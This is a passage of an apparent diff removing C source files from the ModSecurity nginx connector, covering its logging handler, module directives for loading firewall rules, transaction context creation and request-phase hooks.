int ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log);
|
||||
ngx_http_modsecurity_ctx_t *ngx_http_modsecurity_create_ctx(ngx_http_request_t *r);
|
||||
char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p);
|
||||
#if (NGX_PCRE2)
|
||||
#define ngx_http_modsecurity_pcre_malloc_init(x) NULL
|
||||
#define ngx_http_modsecurity_pcre_malloc_done(x) (void)x
|
||||
#else
|
||||
ngx_pool_t *ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool);
|
||||
void ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool);
|
||||
#endif
|
||||
|
||||
/* ngx_http_modsecurity_body_filter.c */
|
||||
ngx_int_t ngx_http_modsecurity_body_filter_init(void);
|
||||
ngx_int_t ngx_http_modsecurity_body_filter(ngx_http_request_t *r, ngx_chain_t *in);
|
||||
|
||||
/* ngx_http_modsecurity_header_filter.c */
|
||||
ngx_int_t ngx_http_modsecurity_header_filter_init(void);
|
||||
ngx_int_t ngx_http_modsecurity_header_filter(ngx_http_request_t *r);
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
int ngx_http_modsecurity_store_ctx_header(ngx_http_request_t *r, ngx_str_t *name, ngx_str_t *value);
|
||||
#endif
|
||||
|
||||
/* ngx_http_modsecurity_log.c */
|
||||
void ngx_http_modsecurity_log(void *log, const void* data);
|
||||
ngx_int_t ngx_http_modsecurity_log_handler(ngx_http_request_t *r);
|
||||
|
||||
/* ngx_http_modsecurity_access.c */
|
||||
ngx_int_t ngx_http_modsecurity_access_handler(ngx_http_request_t *r);
|
||||
|
||||
/* ngx_http_modsecurity_rewrite.c */
|
||||
ngx_int_t ngx_http_modsecurity_rewrite_handler(ngx_http_request_t *r);
|
||||
|
||||
|
||||
#endif /* _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_ */
|
|
@ -1,81 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_log(void *log, const void* data)
|
||||
{
|
||||
const char *msg;
|
||||
if (log == NULL) {
|
||||
return;
|
||||
}
|
||||
msg = (const char *) data;
|
||||
|
||||
ngx_log_error(NGX_LOG_WARN, (ngx_log_t *)log, 0, "%s", msg);
|
||||
}
|
||||
|
||||
|
||||
ngx_int_t
|
||||
ngx_http_modsecurity_log_handler(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
dd("catching a new _log_ phase handler");
|
||||
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
if (mcf == NULL || mcf->enable != 1)
|
||||
{
|
||||
dd("ModSecurity not enabled... returning");
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
/*
|
||||
if (r->method != NGX_HTTP_GET &&
|
||||
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
|
||||
dd("ModSecurity is not ready to deal with anything different from " \
|
||||
"POST, GET or HEAD");
|
||||
return NGX_OK;
|
||||
}
|
||||
*/
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("recovering ctx: %p", ctx);
|
||||
|
||||
if (ctx == NULL) {
|
||||
dd("something really bad happened here. returning NGX_ERROR");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
|
||||
if (ctx->logged) {
|
||||
dd("already logged earlier");
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
dd("calling msc_process_logging for %p", ctx);
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
|
||||
msc_process_logging(ctx->modsec_transaction);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
return NGX_OK;
|
||||
}
|
|
@ -1,793 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
#include "stdio.h"
|
||||
#include <ngx_config.h>
|
||||
#include <ngx_core.h>
|
||||
#include <ngx_http.h>
|
||||
|
||||
static ngx_int_t ngx_http_modsecurity_init(ngx_conf_t *cf);
|
||||
static void *ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf);
|
||||
static char *ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf);
|
||||
static void *ngx_http_modsecurity_create_conf(ngx_conf_t *cf);
|
||||
static char *ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child);
|
||||
static void ngx_http_modsecurity_cleanup_instance(void *data);
|
||||
static void ngx_http_modsecurity_cleanup_rules(void *data);
|
||||
|
||||
|
||||
/*
|
||||
* PCRE malloc/free workaround, based on
|
||||
* https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_pcrefix.c
|
||||
*/
|
||||
|
||||
#if !(NGX_PCRE2)
|
||||
static void *(*old_pcre_malloc)(size_t);
|
||||
static void (*old_pcre_free)(void *ptr);
|
||||
static ngx_pool_t *ngx_http_modsec_pcre_pool = NULL;
|
||||
|
||||
static void *
|
||||
ngx_http_modsec_pcre_malloc(size_t size)
|
||||
{
|
||||
if (ngx_http_modsec_pcre_pool) {
|
||||
return ngx_palloc(ngx_http_modsec_pcre_pool, size);
|
||||
}
|
||||
|
||||
fprintf(stderr, "error: modsec pcre malloc failed due to empty pcre pool");
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void
|
||||
ngx_http_modsec_pcre_free(void *ptr)
|
||||
{
|
||||
if (ngx_http_modsec_pcre_pool) {
|
||||
ngx_pfree(ngx_http_modsec_pcre_pool, ptr);
|
||||
return;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* this may happen when called from cleanup handlers */
|
||||
fprintf(stderr, "error: modsec pcre free failed due to empty pcre pool");
|
||||
#endif
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
ngx_pool_t *
|
||||
ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
|
||||
if (pcre_malloc != ngx_http_modsec_pcre_malloc) {
|
||||
ngx_http_modsec_pcre_pool = pool;
|
||||
|
||||
old_pcre_malloc = pcre_malloc;
|
||||
old_pcre_free = pcre_free;
|
||||
|
||||
pcre_malloc = ngx_http_modsec_pcre_malloc;
|
||||
pcre_free = ngx_http_modsec_pcre_free;
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsec_pcre_pool;
|
||||
ngx_http_modsec_pcre_pool = pool;
|
||||
|
||||
return old_pool;
|
||||
}
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool)
|
||||
{
|
||||
ngx_http_modsec_pcre_pool = old_pool;
|
||||
|
||||
if (old_pool == NULL) {
|
||||
pcre_malloc = old_pcre_malloc;
|
||||
pcre_free = old_pcre_free;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
|
||||
/*
|
||||
* ngx_string's are not null-terminated in common case, so we need to convert
|
||||
* them into null-terminated ones before passing to ModSecurity
|
||||
*/
|
||||
ngx_inline char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p)
|
||||
{
|
||||
char *str = NULL;
|
||||
|
||||
if (a.len == 0) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
str = ngx_pnalloc(p, a.len+1);
|
||||
if (str == NULL) {
|
||||
dd("failed to allocate memory to convert space ngx_string to C string");
|
||||
/* We already returned NULL for an empty string, so return -1 here to indicate allocation error */
|
||||
return (char *)-1;
|
||||
}
|
||||
ngx_memcpy(str, a.data, a.len);
|
||||
str[a.len] = '\0';
|
||||
|
||||
return str;
|
||||
}
|
||||
|
||||
|
||||
ngx_inline int
|
||||
ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log)
|
||||
{
|
||||
char *log = NULL;
|
||||
ModSecurityIntervention intervention;
|
||||
intervention.status = 200;
|
||||
intervention.url = NULL;
|
||||
intervention.log = NULL;
|
||||
intervention.disruptive = 0;
|
||||
ngx_http_modsecurity_ctx_t *ctx = NULL;
|
||||
|
||||
dd("processing intervention");
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
if (ctx == NULL)
|
||||
{
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
|
||||
if (msc_intervention(transaction, &intervention) == 0) {
|
||||
dd("nothing to do");
|
||||
return 0;
|
||||
}
|
||||
|
||||
log = intervention.log;
|
||||
if (intervention.log == NULL) {
|
||||
log = "(no log message was specified)";
|
||||
}
|
||||
|
||||
ngx_log_error(NGX_LOG_ERR, (ngx_log_t *)r->connection->log, 0, "%s", log);
|
||||
|
||||
if (intervention.log != NULL) {
|
||||
free(intervention.log);
|
||||
}
|
||||
|
||||
if (intervention.url != NULL)
|
||||
{
|
||||
dd("intervention -- redirecting to: %s with status code: %d", intervention.url, intervention.status);
|
||||
|
||||
if (r->header_sent)
|
||||
{
|
||||
dd("Headers are already sent. Cannot perform the redirection at this point.");
|
||||
return -1;
|
||||
}
|
||||
|
||||
/**
|
||||
* Not sure if it sane to do this indepent of the phase
|
||||
* but, here we go...
|
||||
*
|
||||
* This code cames from: http/ngx_http_special_response.c
|
||||
* function: ngx_http_send_error_page
|
||||
* src/http/ngx_http_core_module.c
|
||||
* From src/http/ngx_http_core_module.c (line 1910) i learnt
|
||||
* that location->hash should be set to 1.
|
||||
*
|
||||
*/
|
||||
ngx_http_clear_location(r);
|
||||
ngx_str_t a = ngx_string("");
|
||||
|
||||
a.data = (unsigned char *)intervention.url;
|
||||
a.len = strlen(intervention.url);
|
||||
|
||||
ngx_table_elt_t *location = NULL;
|
||||
location = ngx_list_push(&r->headers_out.headers);
|
||||
ngx_str_set(&location->key, "Location");
|
||||
location->value = a;
|
||||
r->headers_out.location = location;
|
||||
r->headers_out.location->hash = 1;
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_http_modsecurity_store_ctx_header(r, &location->key, &location->value);
|
||||
#endif
|
||||
|
||||
return intervention.status;
|
||||
}
|
||||
|
||||
if (intervention.status != 200)
|
||||
{
|
||||
/**
|
||||
* FIXME: this will bring proper response code to audit log in case
|
||||
* when e.g. error_page redirect was triggered, but there still won't be another
|
||||
* required pieces like response headers etc.
|
||||
*
|
||||
*/
|
||||
msc_update_status_code(ctx->modsec_transaction, intervention.status);
|
||||
|
||||
if (early_log) {
|
||||
dd("intervention -- calling log handler manually with code: %d", intervention.status);
|
||||
ngx_http_modsecurity_log_handler(r);
|
||||
ctx->logged = 1;
|
||||
}
|
||||
|
||||
if (r->header_sent)
|
||||
{
|
||||
dd("Headers are already sent. Cannot perform the redirection at this point.");
|
||||
return -1;
|
||||
}
|
||||
dd("intervention -- returning code: %d", intervention.status);
|
||||
return intervention.status;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_cleanup(void *data)
|
||||
{
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
|
||||
ctx = (ngx_http_modsecurity_ctx_t *) data;
|
||||
|
||||
msc_transaction_cleanup(ctx->modsec_transaction);
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
/*
|
||||
* Purge stored context headers. Memory allocated for individual stored header
|
||||
* name/value pair will be freed automatically when r->pool is destroyed.
|
||||
*/
|
||||
ngx_array_destroy(ctx->sanity_headers_out);
|
||||
#endif
|
||||
}
|
||||
|
||||
|
||||
ngx_inline ngx_http_modsecurity_ctx_t *
|
||||
ngx_http_modsecurity_create_ctx(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_str_t s;
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
ctx = ngx_pcalloc(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
|
||||
if (ctx == NULL)
|
||||
{
|
||||
dd("failed to allocate memory for the context.");
|
||||
return NULL;
|
||||
}
|
||||
|
||||
mmcf = ngx_http_get_module_main_conf(r, ngx_http_modsecurity_module);
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("creating transaction with the following rules: '%p' -- ms: '%p'", mcf->rules_set, mmcf->modsec);
|
||||
|
||||
if (mcf->transaction_id) {
|
||||
if (ngx_http_complex_value(r, mcf->transaction_id, &s) != NGX_OK) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
ctx->modsec_transaction = msc_new_transaction_with_id(mmcf->modsec, mcf->rules_set, (char *) s.data, r->connection->log);
|
||||
|
||||
} else {
|
||||
ctx->modsec_transaction = msc_new_transaction(mmcf->modsec, mcf->rules_set, r->connection->log);
|
||||
}
|
||||
|
||||
dd("transaction created");
|
||||
|
||||
ngx_http_set_ctx(r, ctx, ngx_http_modsecurity_module);
|
||||
|
||||
cln = ngx_pool_cleanup_add(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
|
||||
if (cln == NULL)
|
||||
{
|
||||
dd("failed to create the ModSecurity context cleanup");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
cln->handler = ngx_http_modsecurity_cleanup;
|
||||
cln->data = ctx;
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ctx->sanity_headers_out = ngx_array_create(r->pool, 12, sizeof(ngx_http_modsecurity_header_t));
|
||||
if (ctx->sanity_headers_out == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
#endif
|
||||
|
||||
return ctx;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
char *rules;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules = ngx_str_to_char(value[1], cf->pool);
|
||||
|
||||
if (rules == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add(mcf->rules_set, rules, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules: '%s' - reason: '%s'", rules, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_inline += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules_file(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
char *rules_set;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules_set = ngx_str_to_char(value[1], cf->pool);
|
||||
|
||||
if (rules_set == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add_file(mcf->rules_set, rules_set, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_set, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_file += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules_remote(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
const char *rules_remote_key, *rules_remote_server;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules_remote_key = ngx_str_to_char(value[1], cf->pool);
|
||||
rules_remote_server = ngx_str_to_char(value[2], cf->pool);
|
||||
|
||||
if (rules_remote_server == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
if (rules_remote_key == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add_remote(mcf->rules_set, rules_remote_key, rules_remote_server, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_remote_server, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_remote += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *ngx_conf_set_transaction_id(ngx_conf_t *cf, ngx_command_t *cmd, void *conf) {
|
||||
ngx_str_t *value;
|
||||
ngx_http_complex_value_t cv;
|
||||
ngx_http_compile_complex_value_t ccv;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
|
||||
value = cf->args->elts;
|
||||
|
||||
ngx_memzero(&ccv, sizeof(ngx_http_compile_complex_value_t));
|
||||
|
||||
ccv.cf = cf;
|
||||
ccv.value = &value[1];
|
||||
ccv.complex_value = &cv;
|
||||
ccv.zero = 1;
|
||||
|
||||
if (ngx_http_compile_complex_value(&ccv) != NGX_OK) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
mcf->transaction_id = ngx_palloc(cf->pool, sizeof(ngx_http_complex_value_t));
|
||||
if (mcf->transaction_id == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
*mcf->transaction_id = cv;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static ngx_command_t ngx_http_modsecurity_commands[] = {
|
||||
{
|
||||
ngx_string("modsecurity"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_FLAG,
|
||||
ngx_conf_set_flag_slot,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
|
||||
ngx_conf_set_rules,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules_file"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
|
||||
ngx_conf_set_rules_file,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules_remote"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE2,
|
||||
ngx_conf_set_rules_remote,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_transaction_id"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_1MORE,
|
||||
ngx_conf_set_transaction_id,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
0,
|
||||
NULL
|
||||
},
|
||||
ngx_null_command
|
||||
};
|
||||
|
||||
|
||||
static ngx_http_module_t ngx_http_modsecurity_ctx = {
|
||||
NULL, /* preconfiguration */
|
||||
ngx_http_modsecurity_init, /* postconfiguration */
|
||||
|
||||
ngx_http_modsecurity_create_main_conf, /* create main configuration */
|
||||
ngx_http_modsecurity_init_main_conf, /* init main configuration */
|
||||
|
||||
NULL, /* create server configuration */
|
||||
NULL, /* merge server configuration */
|
||||
|
||||
ngx_http_modsecurity_create_conf, /* create location configuration */
|
||||
ngx_http_modsecurity_merge_conf /* merge location configuration */
|
||||
};
|
||||
|
||||
|
||||
ngx_module_t ngx_http_modsecurity_module = {
|
||||
NGX_MODULE_V1,
|
||||
&ngx_http_modsecurity_ctx, /* module context */
|
||||
ngx_http_modsecurity_commands, /* module directives */
|
||||
NGX_HTTP_MODULE, /* module type */
|
||||
NULL, /* init master */
|
||||
NULL, /* init module */
|
||||
NULL, /* init process */
|
||||
NULL, /* init thread */
|
||||
NULL, /* exit thread */
|
||||
NULL, /* exit process */
|
||||
NULL, /* exit master */
|
||||
NGX_MODULE_V1_PADDING
|
||||
};
|
||||
|
||||
|
||||
static ngx_int_t
|
||||
ngx_http_modsecurity_init(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_http_handler_pt *h_rewrite;
|
||||
ngx_http_handler_pt *h_access;
|
||||
ngx_http_handler_pt *h_log;
|
||||
ngx_http_core_main_conf_t *cmcf;
|
||||
int rc = 0;
|
||||
|
||||
cmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_core_module);
|
||||
if (cmcf == NULL)
|
||||
{
|
||||
dd("We are not sure how this returns, NGINX doesn't seem to think it will ever be null");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
/**
|
||||
*
|
||||
* Seems like we cannot do this very same thing with
|
||||
* NGX_HTTP_FIND_CONFIG_PHASE. it does not seems to
|
||||
* be an array. Our next option is the REWRITE.
|
||||
*
|
||||
* TODO: check if we can hook prior to NGX_HTTP_REWRITE_PHASE phase.
|
||||
*
|
||||
*/
|
||||
h_rewrite = ngx_array_push(&cmcf->phases[NGX_HTTP_REWRITE_PHASE].handlers);
|
||||
if (h_rewrite == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_REWRITE_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_rewrite = ngx_http_modsecurity_rewrite_handler;
|
||||
|
||||
/**
|
||||
*
|
||||
* Processing the request body on the access phase.
|
||||
*
|
||||
* TODO: check if hook into separated phases is the best thing to do.
|
||||
*
|
||||
*/
|
||||
h_access = ngx_array_push(&cmcf->phases[NGX_HTTP_ACCESS_PHASE].handlers);
|
||||
if (h_access == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_ACCESS_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_access = ngx_http_modsecurity_access_handler;
|
||||
|
||||
/**
|
||||
* Process the log phase.
|
||||
*
|
||||
* TODO: check if the log phase happens like it happens on Apache.
|
||||
* check if last phase will not hold the request.
|
||||
*
|
||||
*/
|
||||
h_log = ngx_array_push(&cmcf->phases[NGX_HTTP_LOG_PHASE].handlers);
|
||||
if (h_log == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_LOG_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_log = ngx_http_modsecurity_log_handler;
|
||||
|
||||
|
||||
rc = ngx_http_modsecurity_header_filter_init();
|
||||
if (rc != NGX_OK) {
|
||||
return rc;
|
||||
}
|
||||
|
||||
rc = ngx_http_modsecurity_body_filter_init();
|
||||
if (rc != NGX_OK) {
|
||||
return rc;
|
||||
}
|
||||
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
|
||||
static void *
|
||||
ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_main_conf_t *conf;
|
||||
|
||||
conf = (ngx_http_modsecurity_main_conf_t *) ngx_pcalloc(cf->pool,
|
||||
sizeof(ngx_http_modsecurity_main_conf_t));
|
||||
|
||||
if (conf == NULL)
|
||||
{
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/*
|
||||
* set by ngx_pcalloc():
|
||||
*
|
||||
* conf->modsec = NULL;
|
||||
* conf->pool = NULL;
|
||||
* conf->rules_inline = 0;
|
||||
* conf->rules_file = 0;
|
||||
* conf->rules_remote = 0;
|
||||
*/
|
||||
|
||||
cln = ngx_pool_cleanup_add(cf->pool, 0);
|
||||
if (cln == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
cln->handler = ngx_http_modsecurity_cleanup_instance;
|
||||
cln->data = conf;
|
||||
|
||||
conf->pool = cf->pool;
|
||||
|
||||
/* Create our ModSecurity instance */
|
||||
conf->modsec = msc_init();
|
||||
if (conf->modsec == NULL)
|
||||
{
|
||||
dd("failed to create the ModSecurity instance");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/* Provide our connector information to LibModSecurity */
|
||||
msc_set_connector_info(conf->modsec, MODSECURITY_NGINX_WHOAMI);
|
||||
msc_set_log_cb(conf->modsec, ngx_http_modsecurity_log);
|
||||
|
||||
dd ("main conf created at: '%p', instance is: '%p'", conf, conf->modsec);
|
||||
|
||||
return conf;
|
||||
}
|
||||
|
||||
|
||||
static char *
|
||||
ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf)
|
||||
{
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
mmcf = (ngx_http_modsecurity_main_conf_t *) conf;
|
||||
|
||||
ngx_log_error(NGX_LOG_NOTICE, cf->log, 0,
|
||||
"%s (rules loaded inline/local/remote: %ui/%ui/%ui)",
|
||||
MODSECURITY_NGINX_WHOAMI, mmcf->rules_inline,
|
||||
mmcf->rules_file, mmcf->rules_remote);
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static void *
|
||||
ngx_http_modsecurity_create_conf(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_conf_t *conf;
|
||||
|
||||
conf = (ngx_http_modsecurity_conf_t *) ngx_pcalloc(cf->pool,
|
||||
sizeof(ngx_http_modsecurity_conf_t));
|
||||
|
||||
if (conf == NULL)
|
||||
{
|
||||
dd("Failed to allocate space for ModSecurity configuration");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/*
|
||||
* set by ngx_pcalloc():
|
||||
*
|
||||
* conf->enable = 0;
|
||||
* conf->sanity_checks_enabled = 0;
|
||||
* conf->rules_set = NULL;
|
||||
* conf->pool = NULL;
|
||||
* conf->transaction_id = NULL;
|
||||
*/
|
||||
|
||||
conf->enable = NGX_CONF_UNSET;
|
||||
conf->rules_set = msc_create_rules_set();
|
||||
conf->pool = cf->pool;
|
||||
conf->transaction_id = NGX_CONF_UNSET_PTR;
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
conf->sanity_checks_enabled = NGX_CONF_UNSET;
|
||||
#endif
|
||||
|
||||
cln = ngx_pool_cleanup_add(cf->pool, 0);
|
||||
if (cln == NULL) {
|
||||
dd("failed to create the ModSecurity configuration cleanup");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
cln->handler = ngx_http_modsecurity_cleanup_rules;
|
||||
